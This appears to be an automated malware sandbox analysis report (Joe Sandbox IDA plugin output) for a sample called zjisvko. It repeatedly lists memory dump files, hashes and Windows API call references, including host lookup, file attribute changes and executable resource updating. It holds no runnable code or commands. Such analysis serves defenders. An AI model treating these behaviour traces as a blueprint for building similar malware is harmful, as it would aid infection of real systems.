                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalHeapSectionlstrcatlstrcpy$EnterFreeLeaveProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1635794589-0
                                                                                                                                                                                                                                                      • Opcode ID: 697349440ad3a4c0738cd5f6c8bd4ea0e9e62dab480b8c700343a3dd22e704f2
                                                                                                                                                                                                                                                      • Instruction ID: dedfa05831604fd7aa66069306e70089590955466a8fafaf4790451171396cef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 697349440ad3a4c0738cd5f6c8bd4ea0e9e62dab480b8c700343a3dd22e704f2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84E06137641118BBD70023569C06CDF77ACCF93328704003BF500E32429E998D4A597D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                      • Opcode ID: 70eec187e1bc74f4e42c313e75ceff032a5979c6d60e0dc90678fd465b164588
                                                                                                                                                                                                                                                      • Instruction ID: 5b76fad1b3a3026ba39646696a2718e3d834ec5acfd08c0accd955a09e5b93b0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70eec187e1bc74f4e42c313e75ceff032a5979c6d60e0dc90678fd465b164588
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F02E5080E3586AF311A7602E41ABB3A2C6396300F0401BFE5C023282DE3C5D87A77F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004596EC), ref: 00410A89
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,?,004596A4,00000000,00000000), ref: 0041046C
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004104B7
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 004104CD
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 00410528
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004596EC), ref: 00410AB5
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalHeapSectionlstrcatlstrcpy$EnterFreeLeaveProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1635794589-0
                                                                                                                                                                                                                                                      • Opcode ID: cb4259ecb53f39bd3b364a17de4d70ebb816f14b877915ec9a5bf24efd05947b
                                                                                                                                                                                                                                                      • Instruction ID: 558c6fed377a1a06ef59d79f974a0448eb50e41ddbc5651fbdd80fc1f002dbfb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb4259ecb53f39bd3b364a17de4d70ebb816f14b877915ec9a5bf24efd05947b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE0D836500219B7CA013352AC06CEF376CCFC1325700007BF900A1142AFA84A5655BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004596D4), ref: 00410ACB
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,?,004596A4,00000000,00000000), ref: 0041046C
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004104B7
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 004104CD
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 00410528
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004596D4), ref: 00410AF7
                                                                                                                                                                                                                                                        • Part of subcall function 00403B3B: EnterCriticalSection.KERNEL32(0044F7B8), ref: 00403BBA
                                                                                                                                                                                                                                                        • Part of subcall function 00403B3B: LeaveCriticalSection.KERNEL32(0044F7B8), ref: 00403C08
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterHeapLeavelstrcatlstrcpy$FreeProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4118261277-0
                                                                                                                                                                                                                                                      • Opcode ID: 3ca2dd48f282690bd00df644f2c080bdf3a1012e893f5bb480b587024acb2e23
                                                                                                                                                                                                                                                      • Instruction ID: 8a82e384ee3cd6b6b9046089204b46f66385678c75452ab7dc64b47551c4a3b9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca2dd48f282690bd00df644f2c080bdf3a1012e893f5bb480b587024acb2e23
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E0D836500219B7C61167529C06CEF376CCFD2369704003AFA00A1142AFA85A4656BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004596BC), ref: 00410B0D
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,?,004596A4,00000000,00000000), ref: 0041046C
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004104B7
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 004104CD
                                                                                                                                                                                                                                                        • Part of subcall function 0041040C: lstrcatA.KERNEL32(?,?), ref: 00410528
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004596BC), ref: 00410B39
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalHeapSectionlstrcatlstrcpy$EnterFreeLeaveProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1635794589-0
                                                                                                                                                                                                                                                      • Opcode ID: 61f23f1feac9da1857be3caf15ea46eb45817ce79b3c0bc689132db51f1595d8
                                                                                                                                                                                                                                                      • Instruction ID: 01a1a5974bb7879706257b999bec6720d2d3efde8f67bc32b552a0164b2f4e70
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61f23f1feac9da1857be3caf15ea46eb45817ce79b3c0bc689132db51f1595d8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57E0D837504109B7DA0133569C06CEF7B6CCFC1329B10007AFA00A1142ABA85A4655BE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00459674,?,?,?,?,00405B90), ref: 00410911
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00459674,?,?,?,?,00405B90), ref: 0041093C
                                                                                                                                                                                                                                                        • Part of subcall function 004106F5: lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004107DA
                                                                                                                                                                                                                                                        • Part of subcall function 004106F5: lstrcatA.KERNEL32(?,00000000), ref: 004107EE
                                                                                                                                                                                                                                                        • Part of subcall function 004106F5: lstrcatA.KERNEL32(?,00000000), ref: 0041081D
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalHeapSectionlstrcat$EnterFreeLeaveProcesslstrcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3323972785-0
                                                                                                                                                                                                                                                      • Opcode ID: ae954d6f5e76fe2422a43cd1b0bd73ce42c99be91e418301e9b9b40bd99de99e
                                                                                                                                                                                                                                                      • Instruction ID: 2e67d144bda5db5fde53bec597ac830df5b377d2de92b0413c9f70af8a64aae9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae954d6f5e76fe2422a43cd1b0bd73ce42c99be91e418301e9b9b40bd99de99e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13E02037600105B3DB1033679C09CDF362CCFC2719B04007AF600A1142AEA88A5199BD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004596A4,76AF0F10,0040DCA6), ref: 00410A10
                                                                                                                                                                                                                                                        • Part of subcall function 004106F5: lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004107DA
                                                                                                                                                                                                                                                        • Part of subcall function 004106F5: lstrcatA.KERNEL32(?,00000000), ref: 004107EE
                                                                                                                                                                                                                                                        • Part of subcall function 004106F5: lstrcatA.KERNEL32(?,00000000), ref: 0041081D
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004596A4), ref: 00410A2B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionlstrcat$EnterLeavelstrcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 21580356-0
                                                                                                                                                                                                                                                      • Opcode ID: dbad786902521ef2a43ae6b9d13e0d40a3c77f57740725f7f0cc5ceb27dd9b6e
                                                                                                                                                                                                                                                      • Instruction ID: 8ffb7ea9a24c77e789fc70eeb2b3611c4f5ddf6054abb4146ee1ef14009210d2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbad786902521ef2a43ae6b9d13e0d40a3c77f57740725f7f0cc5ceb27dd9b6e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94C01232A85620EBD30123507C0AACA26085F1A71AF054062BA04A018247CA0DBA42EF
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 00406B2A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: gethostbyname
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 930432418-0
                                                                                                                                                                                                                                                      • Opcode ID: 59ebdadbfa4fd2ac7ce1fdd4255f708b262a8d421ab261c42ac288045bea9f76
                                                                                                                                                                                                                                                      • Instruction ID: 390f8c9e623fd061238ed2f251397991bed3ec6c024a29537ca926e32217f973
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59ebdadbfa4fd2ac7ce1fdd4255f708b262a8d421ab261c42ac288045bea9f76
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68E0C0A29011308ADF3467089444FA673F45B42355F174177E856FB2E5C63CADA1A68D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00402188,00000080,76AE83C0), ref: 004094F5
                                                                                                                                                                                                                                                        • Part of subcall function 00409445: GetTickCount.KERNEL32 ref: 00409456
                                                                                                                                                                                                                                                        • Part of subcall function 00409445: GetTickCount.KERNEL32 ref: 0040947E
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: SetFileAttributesA.KERNEL32(00408C76,00000080,00408C76,?,?), ref: 0040920A
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: LoadLibraryA.KERNEL32(?,00000000), ref: 00409223
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: BeginUpdateResourceA.KERNEL32(?,00000001), ref: 00409236
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: EnumResourceNamesA.KERNEL32(00000000,0000000E,004091E1,00000000), ref: 0040924B
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 00409254
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: FreeLibrary.KERNEL32(00000000), ref: 0040925B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$AttributesCountFileLibraryTickUpdate$BeginEnumFreeLoadNames
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 332485259-0
                                                                                                                                                                                                                                                      • Opcode ID: aa2399a63ca9aae241752629d7ee7372cca2ecd2683ada0a11be860c9fc6ac4e
                                                                                                                                                                                                                                                      • Instruction ID: 7a13fce82ae193ae15c9ef1ea134f81cf1a0ad1ef5f9e46982e1901b7c9d945b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa2399a63ca9aae241752629d7ee7372cca2ecd2683ada0a11be860c9fc6ac4e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1E09276908108BADF609A64DC09FC97BA85B50304F0044A5B5C8B5092EAB4A6D98B55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0040D2A9,00000000), ref: 00414DA4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFile
